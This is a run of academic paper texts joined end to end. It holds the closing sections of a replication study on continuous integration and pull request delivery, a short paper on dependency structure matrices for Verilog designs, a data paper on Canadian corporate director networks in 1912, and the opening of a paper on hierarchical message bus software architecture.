investigate a data set of 52 new projects which adopted CI, and 28 projects which are not using CI. However, we used the same data collection procedure and sampling methods to select these projects. Hence, our replication does not aim to, and cannot, answer the question if the observed results are specific to OSS software, to high-profile projects, or to projects written in the Java, Python, PHP, Ruby, or JavaScript programming languages. Further, it should be noted that we only consider projects that make use of Travis-CI. Hence, it remains an open question to what extent our results also generalize to projects using other CI systems, such as GitLab https://about.gitlab.com or Jenkins https://jenkins.io. Internal validity Internal validity questions to what extent the study is able to draw correct conclusions, and does not fall prey to, for instance, confounding factors. One of the key motivations of our replication was to evaluate whether normal changes in projects over the lifetime of the project may be responsible for the effects observed in the original study. This concern was alleviated in our replication. However, other confounding factors may still remain relevant. Particularly concerning in this regard is that our evaluation of a control group of projects that never applied CI has shown results that, ultimately, were not fundamentally different than what we observed for a new data set of CI-using projects. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 20/24 https://peerj.com https://about.gitlab.com https://jenkins.io http://dx.doi.org/10.7717/peerj-cs.245 Hence, we see the need for more work to fully establish the effects of adopting CI in OSS projects. CONCLUSIONS In this work, we replicated an original study by Bernardo, da Costa & Kulesza (2018) that attempted to answer the question whether OSS projects deliver PRs faster after adopting CI. Our replication was motivated by limitations in the original study design, which did not account for changes in PR delivery time independent of CI introduction. We conducted an exact replication of the original work, analyzed the original data using a different statistical procedure (RDD), and extended the original multiple regression model using a new variable (‘‘come-in time’’). Further, we analyze two new data sets, a new set of study subjects that adopted CI and a control group of projects that did not. We were able to replicate the original findings. Our analysis using RDD has not shown any evidence of growth of PR delivery times independent of CI introduction, and our analysis of control group data has revealed that projects which never adopted CI do not see the same increase in submitted, merged, and released PRs as seen for CI-using projects. However, our study also confirms that the impact of CI on the delivery time for an individual PR is only minor. This is in line with the original study, which has also reported primarily small statistical effect sizes. We further find that, before as well as after CI adoption, the best predictor of PR delivery times is when in the release cycle a PR is merged. This indicates that, ultimately, projects need to increase the number of releases to speed up PR delivery times rather than adopt CI. However, the number of releases appears to be largely independent of whether or not a project adopts CI. ACKNOWLEDGEMENTS This work has been conducted as a master project while the first author was a student at Chalmers University of Technology. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work has received financial support by the Swedish Research Council VR under grant number 2018-04127 (Developer-Targeted Performance Engineering for Immersed Release and Software Engineers). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Swedish Research Council VR under grant number 2018-04127 (Developer-Targeted Performance Engineering for Immersed Release and Software Engineers). Competing Interests Philipp Leitner is an Academic Editor for PeerJ Computer Science. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 Author Contributions • Yunfang Guo conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Philipp Leitner conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: All data is available on GitHub: https://github.com/radialine/Do-Open-Source- Projects-Deliver-Pull-Requests-Faster-Using-CI. REFERENCES Bacchelli A, Bird C. 2013. Expectations, outcomes, and challenges of modern code review, ICSE ’13. In: Proceedings of the 2013 international conference on software engineering. Piscataway: IEEE Press. Basili VR, Shull F, Lanubile F. 1999. Building knowledge through families of experi- ments. IEEE Transactions on Software Engineering 25(4):456–473 DOI 10.1109/32.799939. Bernardo JAH, Da Costa DA, Kulesza U. 2018. Studying the impact of adopting continuous integration on the delivery time of pull requests. New York: ACM, 131–141 DOI 10.1145/3196398.3196421. Duvall PM, Matyas S, Glover A. 2007. Continuous integration: improving software quality and reducing risk. London: Pearson Education. Gousios G, Pinzger M, van Deursen A. 2014. An exploratory study of the pull-based software development model. In: ICSE 2014 proceedings of the 36th international conference on software engineering. 345–355. Guo Y. 2019. The impact of adopting continuous integration on the delivery time of pull requests—a partial replication and extension. Gothenburg, Sweden: Department of Computer Science and Engineering, Chalmers University of Gothenburg. Hilton M, Tunnell T, Huang K, Marinov D, Dig D. 2016. Usage, costs, and benefits of continuous integration in open-source projects. In: Proceedings of the 31st IEEE/ACM international conference on automated software engineering. Piscataway: IEEE, 426–437. Imbens GW, Lemieux T. 2008. Regression discontinuity designs: a guide to practice. Journal of Econometrics 142(2):615–635 DOI 10.1016/j.jeconom.2007.05.001. Juristo N, Gómez OS. 2012. Replication of software engineering experiments. In: Empirical software engineering and verification. Springer-Verlag Berlin/Heidelberg: International Summer Schools, LASER 2008–2010, 60–88. Laukkanen E, Paasivaara M, Arvonen T. 2015. Stakeholder perceptions of the adoption of continuous integration–a case study. In: 2015 agile conference. Piscataway: IEEE, 11–20. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 22/24 https://peerj.com https://github.com/radialine/Do-Open-Source-Projects-Deliver-Pull-Requests-Faster-Using-CI https://github.com/radialine/Do-Open-Source-Projects-Deliver-Pull-Requests-Faster-Using-CI http://dx.doi.org/10.1109/32.799939 http://dx.doi.org/10.1145/3196398.3196421 http://dx.doi.org/10.1016/j.jeconom.2007.05.001 http://dx.doi.org/10.7717/peerj-cs.245 Manglaviti M, Coronado-Montoya E, Gallaba K, McIntosh S. 2017. An empirical study of the personnel overhead of continuous integration. In: MSR ’17 proceedings of the 14th international conference on mining software repositories. 471–474. McIntosh S, Kamei Y, Adams B, Hassan AE. 2014. The impact of code review coverage and code review participation on software quality: a case study of the Qt, VTK, and ITK projects. In: Proceedings of the 11th working conference on mining software repositories, MSR 2014. New York: ACM, 192–201 DOI 10.1145/2597073.2597076. Miller A. 2008. A hundred days of continuous integration. In: Agile 2008 conference. Parsons D, Ryu H, Lal R. 2007. The impact of methods and techniques on outcomes from agile software development projects. In: Organizational dynamics of technology- based innovation: diversifying the research agenda. 235–249. Romano J, Kromrey J, Coraggio J, Skowronek J. 2006. Appropriate statistics for ordinal level data: should we really be using t-test and Cohensd for evaluating group differ- ences on the NSSE and other surveys? In: Annual meeting of the florida association of institutional research. Shepperd M. 2018. Replication studies considered harmful. In: Proceedings of the 40th international conference on software engineering: new ideas and emerging results, ICSE- NIER ’18. New York: ACM, 73–76 DOI 10.1145/3183399.3183423. Shull F, Basili V, Carver J, Maldonado JC, Travassos GH, Mendona M, Fabbri S. 2002. Replicating software engineering experiments-addressing the tacit knowledge problem. In: Proceedings international symposium on empirical software engineering. 716. Shull FJ, Carver JC, Vegas S, Juristo N. 2008. The role of replications in empirical software engineering. Empirical Software Engineering 13(2):211–218 DOI 10.1007/s10664-008-9060-1. Stolberg S. 2009. Enabling agile testing through continuous integration. In: 2009 agile conference. Ståhl D, Bosch J. 2014. Modeling continuous integration practice differences in industry software development. Journal of Systems and Software 87:48–59. Thistlethwaite DL, Campbell DT. 1960. Regression-discontinuity analysis: an alternative to the ex post facto experiment. Journal of Educational Psychology 51(6):309–317 DOI 10.1037/h0044319. Vasilescu B, Schuylenburg SV, Wulms J, Serebrenik A, van den Brand MG. 2014. Continuous integration in a social-coding world: empirical evidence from GitHub. In: Software Maintenance and Evolution (ICSME), 2014 IEEE international conference on IEEE. Piscataway: IEEE. Vasilescu B, Yu Y, Wang H, Devanbu P, Filkov V. 2015. Quality and productivity outcomes relating to continuous integration in GitHub. In: Proceedings of the 2015 10th joint meeting on foundations of software engineering - ESEC/FSE 2015. Yu Y, Wang H, Filkov V, Devanbu P, Vasilescu B. 2015. Wait for it: determinants of pull request evaluation latency on GitHub. In: 2015 IEEE/ACM 12th working conference on mining software repositories. Piscataway: IEEE. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 23/24 https://peerj.com http://dx.doi.org/10.1145/2597073.2597076 http://dx.doi.org/10.1145/3183399.3183423 http://dx.doi.org/10.1007/s10664-008-9060-1 http://dx.doi.org/10.1037/h0044319 http://dx.doi.org/10.7717/peerj-cs.245 Yu Y, Yin G, Wang T, Yang C, Wang H. 2016. Determinants of pull-based development in the context of continuous integration. Science China Information Sciences 59:080104 DOI 10.1007/s11432-016-5595-8. Zhao Y, Serebrenik A, Zhou Y, Filkov V, Vasilescu B. 2017. The impact of continuous integration on other software development practices: a large-scale empirical study. In: Proceedings of the 32nd IEEE/ACM international conference on automated software engineering. Piscataway: IEEE, 6071. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 24/24 https://peerj.com http://dx.doi.org/10.1007/s11432-016-5595-8 http://dx.doi.org/10.7717/peerj-cs.245 work_ufoenavatbfmfeqzhmlna4ywna ---- International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 59 DSM Modelling for Digital Design Using Verilog HDL Xing Xue1, Yao Chen2, and Junchao Wei3 1 Faculty of economics and management, ShangLuo University, 726000 ShangLuo, China, chenyao3505@gmail.com 2 Electronic information and electrical engineering college, ShangLuo University, 726000 ShangLuo, China, 16563961@ qq.com 3 School of Mechanical Engineering, Northwestern Polytechnical University, Xi’an 710072, China, weijunchao@mail.nwpu.edu.cn Abstract. In the practice of product design, the efficient control of complexity has increasingly gained importance. The Dependency Structure Matrix (DSM) has proved to be a useful tool for analysing system structure and managing structural complexity. In order to provide a deep insight of system structure in designing Verilog HDL source code artefacts for digital system designers and project managers, the paper proposes a DSM modelling method based on the characteristics of the digital system structural modelling with Verilog and the component dependencies relationship. A DSM modelling example is presented. Result shows that with the DSM model, the source code artefacts can be efficiently analyzed. Keywords: design structure matrix, modeling, Verilog HDL, digital design 1. Introduction Verilog-HDL can be used to model and design a digital system in a form of software programming. How to manage the complexity of source code artefacts is an issue for digital designers. Structural considerations are an established approach to manage complexity [1,2]. A digital system can be decomposed into many sub-systems or modules. Relationships between these modules exist. So system analysis is needed. The DSM[3,4] is a square matrix to identify the dependencies or relationships between components of a system. Components of a system can be parts in a product, tasks of a project, and departments within an organization to be modelled. An n×n DSM has n elements with identical row and column labels and each entry of the DSM represents a particular kind of relationship, such as information flow, force flow, and so on. In the example DSM in Fig. 1, elements are represented by the shaded elements along the diagonal. An off-diagonal mark signifies the dependency of one element on another. If element clk sends information to or influences the behaviour of element M2, then the (Row clk, ColumnM2) entry of the DSM contains a mark. Of course, we can also use the binary relations 1 and 0 to represent the relationships between DSM elements. Furthermore, other numerical values can present more detailed information, International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 60 such as the assessment of importance, rework probabilities, impact of changes, probability of changes, etc.[5]. When a DSM is modelled, it is usually analyzed with clustering algorithms or other algorithms. Through DSMs, valuable insights from the system structure can be derived after examining the interactions within and among the subsystems. The DSM has been used in many fields, including the software field [5-9]; however, no paper is found to use Dependency Structure Matrices (DSMs) for digital design using Verilog. This paper attempts to introduce the DSM to this field. The focus of the paper is how to model DSMs for Verilog HDL programs from a structural viewpoint without considering technical constraints. A simple analysis of system structure using DSMs is illustrated. The rest of this paper is structured as follows. Section 2 reviews digital design using Verilog. Section 3 sets up some rules to model the DSM. Section 4 presents an example model. Finally, the paper proposes a conclusion. Figure.1 Example DSM 2. Structural Modelling Using Verilog HDL Digital circuits are composed of interconnected components, such as logic gates and triggers. In most cases of the digital designs, models are used to express the digital circuits and the design work is done using CAD tools. The design using Verilog HDL embodies hierarchical and modular methodology. At every level of a hierarchical design, the efforts focus on the related level, and details of lower hierarchical levels are hidden, thus facilitating the complex design. This methodology helps to reuse the available modules or purchase IP modules. Furthermore, this hierarchical composition makes functional verification easier. A structural model is composed of 3 kinds of object instances [11]: 1) built-in primitives(and, or, xor, etc); 2) user defined primitives (UDP, such as mux4); and 3) designed modules. Instantiation refers to the formation of a high-level Verilog module by connecting low-level logic primitives or modules. The instantiated object is called as instance. The structural modelling process is done using instantiation. A module is a basic unit in Verilog HDL. It describes the function of a logic entity. The function of a module can be described separately, or through other instances of other modules. That is, a structural DSM Modelling for Digital Design Using Verilog HDL 61 module can include behaviour statements (such as always), continuous assignment statements (assign), build-in primitives, UDPs and other modules, or a combination of these objects. In this sense, a module describes a structure and behaviour of a hardware block in the form of software. A module includes ports as interfaces to exchange information with external environment. From a systematic and structural viewpoint, ports of a module can stand for this module. 3. DSM Modelling for Digital Designs Using Verilog For a digital system design using Verilog, the source code is a kind of design artefacts. Components of this artefact can be module instances described above or other objects of interest, such as reg variables, wire variables, or always blocks. These components can be considered as elements of a DSM and relationships between these elements are defined by signal interaction or logical dependency. The DSM modelling procedure consists of three major steps: Step 1: choose components of digital system according to the hierarchy level. Step 2: represent these components in a DSM. For a Verilog module instance, its port signal set stands for the module itself as a “macro” DSM element; for a block, a set of variables interacting with the outside of the block represent the block itself as a DSM element; a variable can be directly placed in the DSM. Step 3: build up relationships between these elements in the DSM. These relationships depend on interface signal interactions or logical dependencies.For example, a variable on the left-hand side of an assignment statement depends on variables on the right-hand side. 4. Example Fig. 2 shows a portion of FPGA-based functions of a certain control card. There are several instantiated modules: 1) SDAC M1(.StartDAC(StartSDAC), .DAC_Addr(SDAC_addr), .DAC_Data(SDAC_data), .DAC_ Clk(clk_20M), .DAC_SCK(SDAC_sclk), .DAC_SDO(SDAC_sdo), .DAC_CSn(SDAC_cs) ); // serial DAC module 2) M_PWM M2(.Clk(clk),.PWM_En(PWM_en),.count1(count1), .Count2(count2),.Q_PWM(pwm) ); // PWM module 3) Generator20M M3.clkin(clk), .clkout(clk_20M), .reset(reset) ); And there is a finite state machine as a block: always @(negedgeclkor posedgereset ) begin …… End International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 62 In addition, there is an assignment statement about nets reset_n and reset: assign reset_n = !reset; Figure.2 System Composition and Module dependency in the example These three instantiated modules, the finite state machine block and variables reset_n and reset are chosen as elements for DSM elements. The DSM for these digital system can be obtained, as shown in Fig. 3. From this model, it is shown that the net reset_n depends on the net reset. The behaviour of the finite state machine is dependent on the net clk and reset. All these relationships between elements are obviously signified by marks. If a condensed model is needed, interface signals for modules or the block can be hidden and only element names and relationships between these elements are preserved (see Fig. 1). However, many details are lost in this condensed version. A simple analysis of artefact architecture is degree analysis of elements [12]. For example, clk and reset have high out-degrees, so these two elements have more impacts on others while M1 and M2 have no impact on others. Figure.3 DSM modeling for the system in Fig. 2 DSM Modelling for Digital Design Using Verilog HDL 63 5. Conclusion DSMs can reveal the relationships between components in a system in a concise way and provide designers with insight into the system. This paper set up some rules about building up DSMs for digital design usingVerilog-HDL. With the DSM model, the source code artefacts can be efficiently analyzed. References [1] Lindemann U., Maurer M. & Braun T., Structural Complexity Management - An Approach for the Field of Product Design.Berlin :Springer, 2009. [2] Biedermann,W.&Lindemann,U., On the applicability of structural criteria in complexity management.18th International Conference on Engineering Design, ICED 11, Copenhagen, Denmark, pp.11-20, 2011. [3] Steward,D. V., The design structure system: A method for managing the design of complex systems. IEEE Transactions on Engineering Management, 28(3).pp.71–74, 1981. [4]Browning,T.R., Applyingthedesignstructurematrixtosystemdecompositionandintegrationproblems:a reviewandnewdirections. IEEETransactionsonEngineeringManagement,48(3),pp.292–306,2001. [5] Lee, W.-T.,Hsu, K.-H.&Lee, J., Designing Software Architecture with Use Case Blocks using the design structure matrix,2012 International Symposium on Computer, Consumer and Control,Taichung, Taiwan.pp.654-657, 2012. [6]Sangal, N., Jordan, E., Sinha, V. &Jackson, D.,Using Dependency Models to Manage Complex Software Architecture. 20th Annual ACM Conference on Object-Oriented Programming, Systems, Languages, and Applications, San Diego, CA, United states. pp. 167-176, 2005. [7]Sosa, M. E., Browning, T.&Mihm, J., Studying the dynamics of the architecture of software products.2007 Proceedings of the ASME International Design Engineering Technical Conferences and Computers and Information in Engineering Conference, Las Vegas, NV, United states.pp. 329- 342,2007. [8]LaMantia, M. J.,Cai, Y.,MacCormack,A.D.&Rusnak, J.,Analyzing the Evolution of Large-Scale Software Systems using Design structure matrices and design rule theory, 7th IEEE/IFIP Working Conference on Software Architecture, WICSA 2008 , Vancouver, BC, Canada .pp. 83-92 ,2008. [9]Mirson, A.,Skrypnyuk, O.,Elezi, F.&Lindemann, U.,MDM-based software modularization by analysing inter-project dependencies, 13th International Dependency and Structure Modelling Conference, Cambridge, MA, United states.pp.143-157, 2011. [10] Ashenden,P. J. ,Digital Design: an embedded systems approach using verilog. Morgan Kaufmann Publishers,2007. [11] Cavanagh, J., Verilog HDL: Digital Design and Modelling.CRC Press,2007. [12] Sosa, M. E., Eppinger, S. D., and Rowles, C. M., 2007, “A Network Approach to Define Modularity of Components in Complex Products,” ASME J. Mech. Des., 129(11), pp.1118–1129. International Journal of Advanced Network Monitoring and Controls Volume 02 , No. 01 , 2017 64 Author Brief and Sponsors Xing Xue, She received Master degree in School of Management from Xi’an University Of Architecture And Technology, Xi’an, China, in 2009. Now she works at ShangLuo University. Her current research interests include information management and information process. This work was supported by Natural Science Foundation of Shangluo City of Shaanxi Province of China and ShangLuo University (project no.sk2014-01-21, sk2014-01-16) work_uieqxqvitnd5rgfrhxmackzqre ---- © 2018 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). CONNECTIONS Issue 1 | Vol. 39Article | DOI: 10.21307/connections-2019-001 1 Networks of Canadian Business Elites: Historical Corporate Interlock Networks circa 1912 Abstract This paper provides details about a historical dataset of Canadian corporations and business elites who served on corporate boards circa 1912. The source of this corporate interlock data is the Directory of Directors in Canada, 1912, a public domain volume listing Canadi- an public companies in Canada. Because these data are thought to be of interest not only to network researchers, but also to business historians and management scholars, an attempt has been made to make the data as easy to use as possible. Supplementary information has also been added to the network files provided. All of the individu- als and companies in the dataset have been geolocated. The proper 1911 Census Division a company was located in has also been add- ed so that the networks can be combined with other publicly availa- ble data from the period. Two sets of graph files are provided in CSV format with other formats provided on the author’s website. The first file contains corporations as the nodes with directors as edges. The second file has the individual directors as nodes and edges connect- ing them are corporate boards individuals both sat on. Keywords Corporate interlock network, Canadian business elites, business history. The dataset presented in this paper offers a unique view into the relationships of business elites in Canada in the early part of the last century. Canadian business was marked by the existence of powerful families that occupied the boards of many corporations. Also pres- ent, but less common, were more widely held firms with more entrepreneurial owners. At that time, Ca- nadians considered themselves very much a part of the British Empire. The major financial and business centers at the time were Montreal and Toronto. Al- though, the mid-western city of Winnipeg was a rapidly growing regional center as well. This dataset allows for the identification of major corporations and the ties that exist between them through corporate directors. The coverage in the data presented here is the complete volume of the Direc- tory of Directors in Canada published in Canada by W.R. Houston (1912). The entire volume is now public domain and available for download (at https://archive. org/details/directorydirector00housuoft). Houston had close ties to the Toronto Stock Exchange that only grew over time. For example, his offices were originally located nearby the exchange, but eventually they were relocated to the Exchange itself (Murphy, 1984). In the sections that follow, I will outline the details of the graph and associated data that were collect- ed. The data that this paper describes are available as two different network projections. The first is a graph describing the relationships between firms as nodes, with directors as edges relating these organizations. The other file describes the network of individuals that served on the boards of the firms. In this file, the nodes represent people and the edges are the boards that they have common membership on. Both are projec- tions of the same data for ease of use by those less fa- miliar with network visualization and analysis software. Jon MacKay Waterloo Institute for Complexity and Innovation (WICI), The University of Waterloo, Waterloo, Canada. E-mail: jon.mackay@gmail.com. 2 Networks of Canadian Business Elites: Historical Corporate Interlock Networks circa 1912 The format and contents of the corporate graph file The format of the files provided with this paper is comma separated value (CSV) format. This is a plain text format that is usable in spreadsheets and most network visualization and analysis programs. The data files are also available on the author’s website (http:// jgmackay.com) in other file formats, including graph exchange format (GEXF), which is an open graph format supported by many popular network analysis software packages. This standard was developed by the Gephi consortium and supported by Gephi net- work visualization software, which is freely available (Bastian et al., 2009). The GEXF file format has been designed to be open and work with a variety of soft- ware packages. Information about attributes Table 1 lists the attributes of nodes and edges that exist in the graph files and includes a brief explana- tion of the attribute. Weights The edges in the graphs are weighted to represent whether nodes are joined by one or more edges. For example, in the graph, where the companies are the nodes, two companies may have a tie be- tween them with a weight greater than one if there are multiple directors that sit on both corporate boards. Spatial information In addition to the names of the companies in the DoD, some additional information has been added. First, the address of each company has been parsed from the DoD and broken down into more useful compo- nents. In this graph, each firm has a city and province attribute for its location. I have used this information to geolocate each firm so there are additional fields for latitude and longitude. Using a mapping layout that accepts latitude and longitude pairs, a user can easily visualize the locations of corporations or directors on a map of one’s choos- ing. (I suggest Gephi as a network visualization tool.) Most companies and individuals are located in Can- ada. However, the data show directors located in the UK and Europe and some companies located in South America. Finally, I have also linked the geographical loca- tion of companies to the 1911 Canadian Census data files. The field uid_cd_11 contains the unique identifi- cation number for the Census Division numbers in the 1911 Census files. Map files composed of the appro- priate GIS shapefiles should be available from Library Archives Canada or from the Canadian government’s Open Data Initiative website. It should be noted that corporations listed in the files are, for the most part, public firms. The DoD also Table 1. Attributes in graph files. Node attribute field Meaning Field present in City City where the firm is located Company, Person Company Name of the company Company, Person Cprov The 2 letter province code used in the 1911 Canadian Census Company Initials Person’s initials Person LastName Family last name Person Latitude Location information Company, Person Longitude Location information Company, Person Prov Province where the firm is located Company, Person uid_cd_11 Unique regional identifier field in the 1911 Canadian Census Company 3 CONNECTIONS contains some information about regional chambers of commerce and other organizations. The format and contents of the person graph file The graph file containing corporate executives and di- rectors from the DoD has the firms as edges and the nodes as people. This file contains location data (longi- tude and latitude pairs) for both individuals and the firms they worked for. Additionally, there is information about the province and city each individual was located in. Perhaps of most interest for historians of the period are the fields with the full names of individuals. This allows researchers to construct sociograms of the elites of Ca- nadian business of the day. Additional historical back- ground and information about regional elites based on this data is also available (MacKay, 2016). Limitations The key limitations of the data presented here have al- ready been alluded to; it is unknown whether the DoD is representative of all of the public companies in Canada at the time, or whether it was biased toward compa- nies listed on the Toronto Stock Exchange. At the time, Montreal was the home of the major stock exchange, although Toronto was also considered a major center. It seems reasonable to assume that W.R. Houston would not overlook major firms listed in Montreal. However, he may not have been aware of a number of companies that were listed in Winnipeg. The preface to the DoD makes it clear that there were a number of non-respons- es to Houston’s survey of directors of public companies in Canada. However, these limitations are perhaps for- givable given that there does not exist a canonical list of Canadian public companies from this period. Although imperfect, the DoD provides one of the most complete listings of directors and firms from that period (for dis- cussion of these points, see MacKay, 2016). The data used to create the graph files were ex- tracted using optical character recognition (OCR) software from electronic versions of the DoD and then manually corrected by the author and assis- tants. Ultimately assigning a tie between nodes in the graphs relies upon the names being listed consist- ently throughout the DoD. It is also assumed that the OCR and text cleaning process found and corrected any mis-spellings so that the common ties could be correctly created. Every attempt has been made to clean and translate the data appropriately. Conclusion This paper has presented an overview of two pro- jections of graphs based on information extracted from the DoD. The graph files have been created, so that they are easily usable by non-specialists. Additional information has also been added, which makes integrating these networks with Canadian national census data from 1911 possible or plotting locations of directors or companies using longitude and latitude pairs. It is hoped that this information will be of use to both business historians and net- work scholars. Acknowledgments The author would like to thank the participants in the 2016 Canadian Business History Association conference, From Public Interest to Private Profit at the Rotman School of Management, University of Toronto for their helpful feedback on this project. The author is grateful to Professor Leslie Hannah for his insights on this data and public corporations in Canada during this period and also to The Cen- tre for Corporate Reputation in the Saïd Business School at the University of Oxford for funding this project. Jon MacKay is an Affiliated Researcher with the Waterloo Institute for Complexity and Innovation (WICI) at the University of Waterloo, Canada. His interests include network theory, corporate governance, and Canadian business history. References Bastian, M., Heymann, S., & Jacomy, M. 2009. Gephi: An Open Source Software for Exploring and Manipu- lating Networks, 2. Presented at the International AAAI Conference on Weblogs and Social Media. Houston, W. R. 1912. Directory of directors in Can- ada, 1912. Toronto: Houston’s Standard Publications, available at: http://archive.org/details/directorydirector- 00housuoft Mackay, J. 2017. Canadian Regional and National Business Elites in 1912: Who Was Connected, Who Wasn’t and Why? A History of Socially Responsible Business, c.1600–1950: 189–212. Palgrave Macmillan, Cham. Murphy, G. J. 1984. Early Canadian financial state- ment disclosure legislation. The Accounting Historians Journal, 11(2): 39–59. work_ungu7a3275ferluuru6li22iky ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-023 16 Improvement of Architecture Based on Hierarchical Message Bus Zhengwei Wang School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China E-mail: 1328217689@qq.com Jinhui Li School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China E-mail: 715319152 @qq.com Kun Wang School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China E-mail: 644790698@qq.com Abstract—The traditional architecture based on the hierarchical message bus has defects such as strict component requirements and lack of support for reuse. The article introduces message-message modem and interface-message modem construction middleware to propose a new hierarchical message bus. The structure new hierarchical message bus solves the problem that the hierarchical message bus architecture requires too strict system components, and the components that fail to provide corresponding interfaces lack support for reuse. Firstly, the paper introduces the traditional hierarchical message bus architecture and its existing defects. Secondly, the article proposes new hierarchical message bus. based on the hierarchical message bus architecture. Finally, the article summarizes the architecture new hierarchical message bus proposed in this paper. Keywords-Hierarchical Message Bus; Middleware; Modem; New Hierarchical Message Bus I. INTRODUCTION One of the core questions of software architecture design is whether it is possible to use repetitive architecture patterns, that is, whether it can achieve software reuse of the architecture [1]. The structure of the traditional architecture is mostly based on the C/S or hierarchical mode. Although the C/S and hierarchical modes are easy to understand and have high efficiency, they are highly targeted and expand some large systems in specific fields. And the reuse of components is not very friendly. In reality, there is often a need for an architecture with both a stable static structure and sufficient component reuse. Based on the traditional hierarchical message bus structure, this paper further expands and improves the hierarchical message bus for different types of components, and develops intermediate components with wider application scope and better reusability to maximize software reuse. The effect is to achieve greater efficiency of component reuse. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 17 II. KEY TECHNOLOGY Based on the traditional hierarchical message bus structure (HMB), this paper constructs two convenient middleware message-message modem (MMM) and interface-message modem (IMM) for conversion and adjustment of different standard types of components, so as to achieve greater efficiency of component reuse. This article developed two general middleware: 1) Message-Message Modem (MMM), a non-standard component based on the message interconnect interface, uses MMM middleware to send and receive and parse messages between the component and the message bus. 2) Interface-Message Modem (IMM), calling non-standard components of the interface, using IMM middleware to complete the conversion and transmission between the interface and the message. III. ARCHITECTURE DESIGN A. Traditional hierarchical message bus architecture The Hierarchy Message Bus (HMB) architecture is a software architecture proposed by Yang Fuqing et al.[2]. This architecture is based on a hierarchical message bus and supports the distribution and concurrency of components. All components pass through the message bus Communicate as shown in Figure 1. Composite Component Message Bus (Middleware) Component Standard Component Component Component Component Hierarchical Message Bus (Connector) Component Component Component �� Figure 1. Hierarchical message bus architecture diagram The connection of the system is the message bus, which is responsible for the dispatch, delivery, filtering and return of the processing results of the message [4]. The components in the system are all connected to the message bus and register the type of messages that interest them to the message bus. The component sends out the corresponding message according to the needs of the system, and the message bus is responsible for dispatching the message to all components interested in the message in the system. In the HMB architecture, the message is the only way for all components in the system to communicate. When the component receives the message from the message bus, it responds to the message according to its own state, and then returns the corresponding processing result to the target component through the message bus [5]. Since all the components in the system are connected through the message bus, it is not required that each component has the same address space or be limited to one machine, so this style can better describe the distributed concurrent system. The system and the components that make up the system are usually more complicated, and it is difficult to obtain a complete understanding of them from one perspective, so a good software engineering method often models the system from multiple perspectives, generally including the static structure and dynamic behavior of the system And functions [6]. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 18 1) Component model: The component model of HMB includes three parts: component interface, static structure and dynamic behavior, as shown in Figure 2 [3] . Action Interface Structure Internal Message External Message Hierarchical Message Bus (Connector) Component Component Component Figure 2. Component model of HMB architecture The interface part of the component represents the set of interfaces supported by the component. Common ones are internal standard message interface, external message standard interface and external interface, and each interface defines a set of input and output messages. The behavior part of the component is represented by the finite state automaton with output. When the component receives the message, the finite state automaton responds to the received message according to the current state, resulting in a state transition. The structural part of the component represents the internal structure of the composite component. The composite component is composed of an atomic component and a local message bus. Several local components can be connected to the local message bus. The local message bus is a simple representation of the message bus. The role of the message bus it shows that it provides a unified integration mechanism for the entire system and components at all levels. 2) Component interface: Generally speaking, the component interface represents the interaction path between the component and the external environment. In the HMB architecture, the component interface is a message-based interconnection interface, where the interface represents the set of messages sent and received by the component, and the components communicate with each other through messages, which together constitute the component interface. In the general system defined by the interconnection interface, the connection between components is usually a fixed match between the requester of the service and the service provider, while in the system defined by the HMB architecture, the component has external messages After the response, it will cause a change of state. Therefore, it can be found that, after receiving the same message, a component may have different responses at different times and in different states. 3) Message bus: The message bus is the connection of the system. In the system, all components form a component-message response registration form by registering the types of messages of interest to the message bus. The message bus locates the corresponding message based on the type of message it receives and the information in the component-message response registration table, passes the message to the corresponding responder, and is responsible for returning the processing result. When necessary, the message bus also needs to filter and block specific messages, as shown in Figure 3. Component_1 Component_2 Transfer Message Message Bus Attribute: Component instance table Component response table Message filtering table Services: Message registration Message dispatch Message transfer Message filtering Figure 3. Message bus structure diagram International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 19 Message registration: The component registers the response message set with the message bus. Message dispatching and delivery: Messages are passed between components through the message bus. The message bus dispatches messages to components interested in the message according to the component-message response registration form, and returns the processing results [8]. Message filtering: The message bus implements message filtering between components through message conversion or message blocking, to avoid message conflicts and message mismatch problems during component integration. Through the above analysis, it can be found that the HMB architecture improves the degree of cohesion between the various components, while reducing the degree of coupling between the components, but there are still certain defects: First, if there is an existing well-functioning component, but due to the different form of the interface, it will not be used in this system, and it is necessary to re-develop the same functional component that fully complies with the interface standard, which is in line with the architectural style to improve software reuse Development efficiency is contradictory. Second, although the message filtering mechanism of the message bus has a certain message matching function, it can only process components that interact through messages, but not components that interact through interface calls, and it may be necessary to match different messages. Modifying the design of the message bus has caused some instability to the system. Third, the architectural style of HMB has too strict requirements on the components that make up the system. Only strictly qualified components can be used, and there is a lack of reuse support for components that fail to provide corresponding interfaces. Therefore, it is necessary to improve and expand the architecture based on the hierarchical message bus. B. New hierarchical message bus architecture Composite Component Message Bus (Middleware) IMM Standard Component MMM Component Component Hierarchical Message Bus (Connector) Component Component Component �� IMMC IMMC Figure 4. Schematic diagram of the NHMB architecture This paper improves the traditional HMB architecture and becomes a new HMB architecture style 